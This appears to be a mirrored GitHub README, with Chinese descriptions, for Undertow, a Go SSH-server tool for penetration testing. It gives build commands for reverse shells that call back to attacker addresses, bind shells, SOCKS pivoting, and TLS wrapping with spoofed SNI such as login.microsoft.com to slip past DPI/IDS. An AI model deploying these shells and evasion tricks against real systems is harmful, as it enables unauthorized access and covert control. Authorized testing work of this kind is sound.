Real-Fruit-Snacks/Undertow

GitHub: Real-Fruit-Snacks/Undertow

一个面向渗透测试的静态链接 SSH 服务器,支持反向/正向 shell、SFTP、端口转发和 TLS 混淆,集成在小于 1.5MB 的单二进制文件中。

Stars: 0 | Forks: 0

Undertow ![Go](https://img.shields.io/badge/language-Go-00ADD8.svg) ![Platform](https://img.shields.io/badge/platform-Linux%20%7C%20Windows-lightgrey) ![License](https://img.shields.io/badge/license-GPLv3-blue.svg) **渗透测试用的静态链接 SSH 服务器 —— 体积小于 1.5MB。** 反向 shell、正向 shell、SFTP 文件传输,以及完整的 SSH 端口转发,全部集成在一个静态二进制文件中。可选的 TLS 封装可将 SSH 隐藏在 HTTPS 中以躲避线路上的 DPI/IDS 检测。
## 快速开始 **前置条件:** Go 1.15+、Make ``` git clone https://github.com/Real-Fruit-Snacks/Undertow.git cd Undertow ``` **反向 shell:** ``` ./build.sh reverse 192.168.1.10:4444 ./bin/handler-192-168-1-10-4444 # start handler, shows SSH command on callback ``` **正向 shell:** ``` ./build.sh listen 8888 ssh -p 8888 svc@TARGET_IP # connect from attacker ``` ## 功能 ### 反向与正向模式 反向模式可穿透防火墙主动连接回家。正向模式在目标机器上监听。两者都同样支持 PTY、SFTP 和端口转发。 ``` ./build.sh reverse 10.10.14.5:4444 # reverse shell ./build.sh listen 8888 # bind shell ./build.sh reverse 10.10.14.5:443 --tls # TLS-wrapped reverse ./build.sh listen 8888 --tls --sni google.com # TLS with SNI spoofing ``` ### TLS 封装 使用 ALPN 协商和 SNI 伪装将 SSH 封装在 TLS 中。在线路上看起来像 HTTPS —— SSH 横幅永远不会以明文形式出现。 ``` ./build.sh reverse 10.10.14.5:443 --tls --sni login.microsoft.com ``` ### SFTP 文件传输 内置 SFTP 子系统。上传工具、下载战利品 —— 全部通过同一个 SSH 连接完成。 ### 端口转发 本地、远程和动态(SOCKS)转发。通过目标主机进行横向移动以到达内部网络。 ``` ssh -D 1080 svc@TARGET # SOCKS proxy ssh -L 8080:internal:80 svc@TARGET # local forward ``` ### 处理程序脚本 构建脚本会自动生成一个处理程序,在收到回调时启动监听器、显示凭据并展示 SSH 命令。 ## 架构 ``` Undertow/ ├── main.go # Entry point, mode selection ├── core.go # SSH server configuration, key generation ├── ssh_session.go # Session handling, PTY, SFTP ├── ssh_session_unix.go # Linux PTY via creack/pty ├── ssh_session_windows.go # Windows ConPTY ├── build.sh # Build script with handler generation └── Makefile ``` 单一静态二进制文件。`CGO_ENABLED=0` 交叉编译。Linux 版本小于 1.5MB。可通过 `--compress` 选择使用 UPX 压缩。 ## 平台支持 | | Linux | Windows | |---|---|---| | 反向 shell | 完整支持 (PTY) | 完整支持 (ConPTY) | | 正向 shell | 完整支持 | 完整支持 | | SFTP | 完整支持 | 完整支持 | | 端口转发 | 完整支持 | 完整支持 | | TLS 封装 | 完整支持 | 完整支持 | ## 安全 请通过 [GitHub Security Advisories](https://github.com/Real-Fruit-Snacks/Undertow/security/advisories) 报告漏洞。90 天负责任披露。 **Undertow 不会:** - 持久化或安装自身(单次执行,无持久化) - 躲避 EDR/XDR 行为分析 - 隐藏网络连接(netstat 或 ss 可见) - 在没有有效 SSH 凭据的情况下运行 ## 许可证 [GPLv3](LICENSE) — Copyright 2026 Real-Fruit-Snacks
标签:DPI绕过, Go语言, IDS规避, IP 地址批量处理, SFTP文件传输, SNI欺骗, SSH服务器, TLS加密, 代码生成, 单二进制, 反向shell, 后门工具, 日志审计, 渗透测试工具, 程序破解, 端口转发, 绑定shell, 网络流量混淆, 远控工具, 防火墙穿透, 静态编译, 静态链接